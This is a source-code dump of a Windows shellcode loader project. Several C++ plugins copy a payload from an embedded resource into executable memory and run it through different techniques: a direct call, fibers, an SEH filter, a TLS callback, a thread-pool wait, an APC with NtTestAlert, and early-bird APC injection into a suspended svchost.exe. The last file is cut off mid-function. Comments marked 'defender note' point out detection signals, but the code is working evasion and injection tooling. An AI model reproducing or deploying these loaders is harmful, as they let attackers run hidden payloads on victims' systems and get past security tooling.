├── Readme.assets
├── .gitkeep
├── image-20201124160121278.png
├── image-20201124160202106.png
├── image-20201124160330548.png
├── image-20201124160839607.png
├── image-20201124161035698.png
├── image-20201124161715516.png
├── image-20201124162310551.png
├── image-20201124162327193.png
├── image-20201124162721783.png
├── image-20201124162912373.png
├── image-20201124163656133.png
├── image-20201124163815942.png
├── image-20201130105338767.png
├── image-20201130105408030.png
├── image-20201130105439913.png
├── image-20201130105542851.png
├── image-20201130105623219.png
├── image-20201130105709563.png
├── image-20201130105735363.png
└── 1fef278889c961331a185698c35d220.png
├── plug
├── public.hpp
├── Dynamic Load
│ ├── public.hpp
│ ├── Dynamic Load.vcxproj.filters
│ ├── Dynamic.cpp
│ └── Dynamic Load.vcxproj
├── Dynamic Load plus
│ ├── public.hpp
│ ├── Dynamic Load plus.vcxproj.filters
│ ├── Dynamic_plus.cpp
│ └── Dynamic Load plus.vcxproj
├── TLS Callback Load
│ ├── public.hpp
│ ├── TLS Callback Load.vcxproj.filters
│ ├── TLS.cpp
│ └── TLS Callback Load.vcxproj
├── Direct Load
│ ├── Direct Load.vcxproj.filters
│ ├── Direct.cpp
│ └── Direct Load.vcxproj
├── Fiber Load
│ ├── Fiber Load.vcxproj.filters
│ ├── Fiber.cpp
│ └── Fiber Load.vcxproj
├── APC-Ijnect Load
│ ├── APC-Ijnect Load.vcxproj.filters
│ ├── APC.cpp
│ └── APC-Ijnect Load.vcxproj
├── SEH Except Load
│ ├── SEH Except Load.vcxproj.filters
│ ├── SEH.cpp
│ └── SEH Except Load.vcxproj
├── Syscall Load
│ ├── Syscall Load.vcxproj.filters
│ ├── Syscall.cpp
│ └── Syscall Load.vcxproj
├── NtTestAlert Load
│ ├── NtTestAlert Load.vcxproj.filters
│ ├── NtTestAlert.cpp
│ └── NtTestAlert Load.vcxproj
├── OEP Hiijack-Inject Load
│ ├── OEP Hiijack-Inject Load.vcxproj.filters
│ ├── OEP.cpp
│ └── OEP Hiijack-Inject Load.vcxproj
├── Thread Hiijack-Inject Load
│ ├── Thread Hiijack-Inject Load.vcxproj.filters
│ ├── Thread.cpp
│ └── Thread Hiijack-Inject Load.vcxproj
├── Early Bird APC-Injetc Load
│ ├── Early Bird APC-Injetc Load.vcxproj.filters
│ ├── Early_APC.cpp
│ └── Early Bird APC-Injetc Load.vcxproj
├── CreateThreatPoolWait Load
│ ├── CreateThreatPoolWait Load.vcxproj.filters
│ ├── CreateThreatPoolWait.cpp
│ └── CreateThreatPoolWait Load.vcxproj
└── NtCreateSection-Inject Load
│ ├── NtCreateSection-Inject Load.vcxproj.filters
│ ├── NtCreateSection.cpp
│ └── NtCreateSection-Inject Load.vcxproj
├── shellcodeLoader
├── stdafx.h
├── resource.h
├── stdafx.cpp
├── targetver.h
├── shellcodeLoader.h
├── shellcodeLoader.rc
├── shellcodeLoader.cpp
├── shellcodeLoaderDlg.h
├── res
│ ├── shellcodeLoader.ico
│ └── shellcodeLoader.rc2
├── shellcodeLoaderDlg.cpp
├── shellcodeLoader.vcxproj.filters
└── shellcodeLoader.vcxproj
├── readme_cn.md
├── Readme.md
└── shellcodeLoader.sln
/Readme.assets/.gitkeep:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/plug/public.hpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/plug/public.hpp
--------------------------------------------------------------------------------
/shellcodeLoader/stdafx.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/stdafx.h
--------------------------------------------------------------------------------
/shellcodeLoader/resource.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/resource.h
--------------------------------------------------------------------------------
/shellcodeLoader/stdafx.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/stdafx.cpp
--------------------------------------------------------------------------------
/plug/Dynamic Load/public.hpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/plug/Dynamic Load/public.hpp
--------------------------------------------------------------------------------
/shellcodeLoader/targetver.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/targetver.h
--------------------------------------------------------------------------------
/plug/Dynamic Load plus/public.hpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/plug/Dynamic Load plus/public.hpp
--------------------------------------------------------------------------------
/plug/TLS Callback Load/public.hpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/plug/TLS Callback Load/public.hpp
--------------------------------------------------------------------------------
/shellcodeLoader/shellcodeLoader.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/shellcodeLoader.h
--------------------------------------------------------------------------------
/shellcodeLoader/shellcodeLoader.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/shellcodeLoader.rc
--------------------------------------------------------------------------------
/shellcodeLoader/shellcodeLoader.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/shellcodeLoader.cpp
--------------------------------------------------------------------------------
/shellcodeLoader/shellcodeLoaderDlg.h:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/shellcodeLoaderDlg.h
--------------------------------------------------------------------------------
/shellcodeLoader/res/shellcodeLoader.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/res/shellcodeLoader.ico
--------------------------------------------------------------------------------
/shellcodeLoader/res/shellcodeLoader.rc2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/res/shellcodeLoader.rc2
--------------------------------------------------------------------------------
/shellcodeLoader/shellcodeLoaderDlg.cpp:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/shellcodeLoader/shellcodeLoaderDlg.cpp
--------------------------------------------------------------------------------
/Readme.assets/image-20201124160121278.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124160121278.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124160202106.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124160202106.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124160330548.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124160330548.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124160839607.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124160839607.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124161035698.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124161035698.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124161715516.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124161715516.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124162310551.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124162310551.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124162327193.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124162327193.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124162721783.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124162721783.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124162912373.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124162912373.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124163656133.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124163656133.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201124163815942.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201124163815942.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201130105338767.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201130105338767.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201130105408030.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201130105408030.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201130105439913.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201130105439913.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201130105542851.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201130105542851.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201130105623219.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201130105623219.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201130105709563.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201130105709563.png
--------------------------------------------------------------------------------
/Readme.assets/image-20201130105735363.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/image-20201130105735363.png
--------------------------------------------------------------------------------
/Readme.assets/1fef278889c961331a185698c35d220.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/knownsec/shellcodeloader/HEAD/Readme.assets/1fef278889c961331a185698c35d220.png
--------------------------------------------------------------------------------
/plug/Direct Load/Direct Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/Fiber Load/Fiber Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/APC-Ijnect Load/APC-Ijnect Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/SEH Except Load/SEH Except Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/Syscall Load/Syscall Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/NtTestAlert Load/NtTestAlert Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/OEP Hiijack-Inject Load/OEP Hiijack-Inject Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/Thread Hiijack-Inject Load/Thread Hiijack-Inject Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/Early Bird APC-Injetc Load/Early Bird APC-Injetc Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/CreateThreatPoolWait Load/CreateThreatPoolWait Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/NtCreateSection-Inject Load/NtCreateSection-Inject Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
--------------------------------------------------------------------------------
/plug/Direct Load/Direct.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 |
3 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
4 | { // Entry point: copies the bytes of resource 100 into newly allocated executable memory and calls them on the current thread. None of the four parameters is read.
5 | //1. Fetch the payload bytes and their size from resource ID 100 (GetShellcodeFromRes is not defined in this file; presumably it comes from ..\public.hpp)
6 | UINT shellcodeSize = 0;
7 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
8 | if (shellcode == nullptr)
9 | {
10 | return 0; // no payload returned: exit silently with status 0
11 | }
12 | //2. Allocate a private region that is readable, writable and executable at the same time, then copy the payload into it
13 | LPVOID Memory = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // defender note: private RWX memory with no backing image file is a common memory-scanner signal; the return value is not checked before use
14 | memcpy(Memory, shellcode, shellcodeSize);
15 | //3. Call the copied bytes as a void(void) function on the current thread
16 | ((void(*)())Memory)();
17 | return 0;
18 | }
--------------------------------------------------------------------------------
/plug/Dynamic Load/Dynamic Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
15 |
16 | 源文件
17 |
18 |
19 |
--------------------------------------------------------------------------------
/plug/TLS Callback Load/TLS Callback Load.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
15 |
16 | 源文件
17 |
18 |
19 |
--------------------------------------------------------------------------------
/plug/Dynamic Load plus/Dynamic Load plus.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 |
10 |
11 | 源文件
12 |
13 |
14 |
15 |
16 | 源文件
17 |
18 |
19 |
--------------------------------------------------------------------------------
/plug/Dynamic Load plus/Dynamic_plus.cpp:
--------------------------------------------------------------------------------
1 | #include"public.hpp"
2 |
3 |
4 |
5 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
6 | { // Entry point: same flow as a direct in-process load, except that VirtualAlloc is reached through a pointer returned by GetKernelFunc. None of the four parameters is read.
7 | //1. Fetch the payload bytes and their size from resource ID 100
8 | UINT shellcodeSize = 0;
9 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
10 | if (shellcode == nullptr)
11 | {
12 | return 0; // no payload returned: exit silently with status 0
13 | }
14 | //2. Obtain VirtualAlloc as a function pointer at run time, allocate RWX memory through it and copy the payload in
15 | pfnVirtualAlloc fnVirtualAlloc = (pfnVirtualAlloc)GetKernelFunc("VirtualAlloc"); // NOTE(review): GetKernelFunc and pfnVirtualAlloc are not defined in this file (presumably in the local public.hpp); presumably a by-name export lookup - confirm. The API name still appears as a plain string literal here.
16 | LPVOID Memory = fnVirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // defender note: the resulting private RWX region is visible to memory scanners however the API address was obtained; neither the pointer nor the allocation is checked for NULL
17 | memcpy(Memory, shellcode, shellcodeSize);
18 | //3. Call the copied bytes as a void(void) function on the current thread
19 | ((void(*)())Memory)();
20 | return 0;
21 | }
--------------------------------------------------------------------------------
/plug/Dynamic Load/Dynamic.cpp:
--------------------------------------------------------------------------------
1 | #include"public.hpp"
2 |
3 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
4 | { // Entry point: in-process load where VirtualAlloc is called through a pointer looked up with GetProcAddress instead of by its imported name. None of the four parameters is read.
5 | //1. Fetch the payload bytes and their size from resource ID 100
6 | UINT shellcodeSize = 0;
7 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
8 | if (shellcode == nullptr)
9 | {
10 | return 0; // no payload returned: exit silently with status 0
11 | }
12 | //2. Look up VirtualAlloc in the already-loaded kernel32.dll, allocate RWX memory through the pointer and copy the payload in
13 | pfnVirtualAlloc fnVirtualAlloc = (pfnVirtualAlloc)GetProcAddress(GetModuleHandle(L"kernel32.dll"), "VirtualAlloc"); // defender note: GetProcAddress/GetModuleHandle are still called by name and "VirtualAlloc" remains a plain string literal in this source; the lookup result is not checked
14 | LPVOID Memory = fnVirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // private RWX region, same memory-scanner signal as a direct VirtualAlloc call
15 | memcpy(Memory, shellcode, shellcodeSize);
16 | //3. Call the copied bytes as a void(void) function on the current thread
17 | ((void(*)())Memory)();
18 | return 0;
19 | }
20 |
--------------------------------------------------------------------------------
/plug/TLS Callback Load/TLS.cpp:
--------------------------------------------------------------------------------
1 | #include"public.hpp"
2 |
3 |
4 |
5 | VOID NTAPI TlsCallBack(PVOID DllHandle, DWORD dwReason, PVOID Reserved)
6 | { // TLS callback: on process attach, loads resource 100 and calls the address held in Memory. DllHandle and Reserved are not read.
7 | if (dwReason == DLL_PROCESS_ATTACH) // act only on the process-attach notification; other reasons fall through and do nothing
8 | {
9 | //1. Load the payload from resource ID 100; the returned pointer is discarded here
10 | UINT shellcodeSize = 0;
11 | GetShellcodeFromRes(100, shellcodeSize);
12 | //2. Call the address stored in Memory as a void(void) function. NOTE(review): Memory is not declared in this file - presumably a global that this project's local public.hpp fills in inside GetShellcodeFromRes; confirm.
13 | ((void(*)())Memory)(); // defender note: this runs from a TLS callback, i.e. before wWinMain; analysis that starts at the PE entry point will already be past it
14 | }
15 | }
16 |
17 |
18 | #pragma comment (linker, "/INCLUDE:__tls_used")
19 | #pragma comment (linker, "/INCLUDE:__tls_callback")
20 | // The two /INCLUDE directives above force the linker to keep the TLS directory symbol and the callback pointer below. The doubled leading underscore looks like x86 name decoration - TODO confirm the target architecture.
21 | // Defender note: the PE TLS directory of the built binary will list a callback; check it during triage, since that code runs before the entry point.
22 | #pragma data_seg (".CRT$XLB")
23 | EXTERN_C PIMAGE_TLS_CALLBACK _tls_callback = TlsCallBack; // pointer placed in the .CRT$XLB section so that TlsCallBack is picked up as a TLS callback
24 | #pragma data_seg ()
25 |
26 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
27 | { // Entry point is intentionally empty: all work in this file happens in TlsCallBack. An empty entry point next to a TLS callback is itself a triage hint.
28 | return 0;
29 | }
--------------------------------------------------------------------------------
/plug/Fiber Load/Fiber.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 |
3 |
4 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
5 | { // Entry point: copies resource 100 into RWX memory and runs it as the start routine of a fiber on the current thread. None of the four parameters is read.
6 | //1. Fetch the payload bytes and their size from resource ID 100
7 | UINT shellcodeSize = 0;
8 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
9 | if (shellcode == nullptr)
10 | {
11 | return 0; // no payload returned: exit silently with status 0
12 | }
13 | //2. Allocate a private RWX region and copy the payload into it
14 | LPVOID Memory = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // defender note: private RWX memory; return value is not checked
15 | memcpy(Memory, shellcode, shellcodeSize);
16 | //3. Turn the current thread into a fiber, create a second fiber whose start routine is the payload address, and switch to it
17 | PVOID mainFiber = ConvertThreadToFiber(NULL); // mainFiber is assigned but never read again in this function
18 | PVOID shellcodeFiber = CreateFiber(NULL, (LPFIBER_START_ROUTINE)Memory, NULL); // defender note: a fiber start address that lies in private, non-image memory is the artefact to look for; no new thread is created
19 | SwitchToFiber(shellcodeFiber);
20 | DeleteFiber(shellcodeFiber); // reached only if something switches back to this fiber
21 | return 0;
22 | }
--------------------------------------------------------------------------------
/plug/SEH Except Load/SEH.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 |
3 | LPVOID Memory; // file-scope pointer to the payload copy: written in wWinMain, called from ExceptFilter
4 | int ExceptFilter()
5 | { // SEH filter expression: calls the address in the global Memory, then asks the system to resume at the faulting instruction
6 | ((void(*)())Memory)(); // defender note: the payload runs inside exception filtering, so a debugger first sees an access violation from the null write in wWinMain
7 | return EXCEPTION_CONTINUE_EXECUTION; // if the call above returns, the faulting store is retried with the pointer still null
8 | }
9 |
10 |
11 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
12 | { // Entry point: copies resource 100 into RWX memory, then deliberately faults so that ExceptFilter (which calls Memory) is evaluated. None of the four parameters is read.
13 | //1. Fetch the payload bytes and their size from resource ID 100
14 | UINT shellcodeSize = 0;
15 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
16 | if (shellcode == nullptr)
17 | {
18 | return 0; // no payload returned: exit silently with status 0
19 | }
20 | //2. Allocate a private RWX region, publish it through the global Memory and copy the payload in
21 | Memory = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // defender note: private RWX memory; return value is not checked
22 | memcpy(Memory, shellcode, shellcodeSize);
23 | //3. Write through a null pointer inside a guarded block; the resulting access violation makes the system evaluate ExceptFilter()
24 | int* p = 0x00000000;
25 | _try
26 | {
27 | *p = 13; // intentional access violation
28 | }
29 | _except(ExceptFilter())
30 | {
31 | }; // handler body is empty: the work is done in the filter expression, not here
32 | return 0;
33 | }
--------------------------------------------------------------------------------
/plug/CreateThreatPoolWait Load/CreateThreatPoolWait.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 |
3 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
4 | { // Entry point: copies resource 100 into RWX memory and registers that address as a thread-pool wait callback on an event. None of the four parameters is read.
5 | //1. Fetch the payload bytes and their size from resource ID 100
6 | UINT shellcodeSize = 0;
7 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
8 | if (shellcode == nullptr)
9 | {
10 | return 0; // no payload returned: exit silently with status 0
11 | }
12 | //2. Allocate a private RWX region and copy the payload into it
13 | LPVOID Memory = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // defender note: private RWX memory; return value is not checked
14 | memcpy(Memory, shellcode, shellcodeSize);
15 | //3. Register the payload address as the callback of a thread-pool wait object bound to an event
16 | HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL); // unnamed auto-reset event (second argument FALSE) created already signaled (third argument TRUE)
17 | PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)Memory, NULL, NULL); // defender note: the callback address lies in private, non-image memory and is run by a thread-pool worker, not by a thread this code creates
18 | SetThreadpoolWait(threadPoolWait, event, NULL); // NULL timeout argument
19 | WaitForSingleObject(event, INFINITE); // the main thread waits on the same auto-reset event that the pool wait was registered on
20 | return 0;
21 | }
--------------------------------------------------------------------------------
/plug/NtTestAlert Load/NtTestAlert.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 | //#pragma comment(lib, "ntdll")
3 | using pNtTestAlert = NTSTATUS(NTAPI*)(); // pointer type for ntdll's NtTestAlert, which wWinMain resolves at run time (the static ntdll link on the line above is commented out)
4 |
5 |
6 |
7 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
8 | { // Entry point: copies resource 100 into RWX memory, queues it as a user APC on the current thread and then calls NtTestAlert. None of the four parameters is read.
9 | //1. Fetch the payload bytes and their size from resource ID 100
10 | UINT shellcodeSize = 0;
11 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
12 | if (shellcode == nullptr)
13 | {
14 | return 0; // no payload returned: exit silently with status 0
15 | }
16 | //2. Allocate a private RWX region and copy the payload into it
17 | LPVOID Memory = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); // defender note: private RWX memory; return value is not checked
18 | memcpy(Memory, shellcode, shellcodeSize);
19 | //3. Queue the payload address as an APC on this thread, then call NtTestAlert
20 | pNtTestAlert NtTestAlert = (pNtTestAlert)(GetProcAddress(GetModuleHandleA("ntdll"), "NtTestAlert")); // looked up by name in the already-loaded ntdll; the result is not checked for NULL
21 | PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)Memory;
22 | QueueUserAPC((PAPCFUNC)apcRoutine, GetCurrentThread(), NULL); // defender note: an APC routine address in private, non-image memory queued to the caller's own thread
23 | NtTestAlert(); // NOTE(review): NtTestAlert is not a documented Win32 API; this code relies on it to deliver the APC queued on the previous line
24 | return 0;
25 | }
--------------------------------------------------------------------------------
/plug/Early Bird APC-Injetc Load/Early_APC.cpp:
--------------------------------------------------------------------------------
1 | #include"..\public.hpp"
2 |
3 | int APIENTRY wWinMain(_In_ HINSTANCE hInstance, _In_opt_ HINSTANCE hPrevInstance, _In_ LPWSTR lpCmdLine, _In_ int nCmdShow)
4 | { // Entry point: starts svchost.exe suspended, writes resource 100 into it and queues the written address as an APC on its primary thread before resuming it. None of the four parameters is read; no API result is checked.
5 | //1. Fetch the payload bytes and their size from resource ID 100
6 | UINT shellcodeSize = 0;
7 | unsigned char *shellcode = GetShellcodeFromRes(100, shellcodeSize);
8 | if (shellcode == nullptr)
9 | {
10 | return 0; // no payload returned: exit silently with status 0
11 | }
12 | //2. Create the target process in a suspended state and allocate RWX memory inside it
13 | STARTUPINFOA si = { 0 };
14 | PROCESS_INFORMATION pi = { 0 };
15 | CreateProcessA("C:\\Windows\\System32\\svchost.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi); // defender note: svchost.exe started with a NULL command line by a parent other than services.exe is a well-known process-creation detection
16 | HANDLE victimProcess = pi.hProcess;
17 | HANDLE threadHandle = pi.hThread;
18 | LPVOID shellAddress = VirtualAllocEx(victimProcess, NULL, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); // defender note: cross-process RWX allocation in a freshly created, still-suspended child
19 | //3. Write the payload into the child, queue it as an APC on the child's suspended primary thread, then resume that thread
20 | PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellAddress;
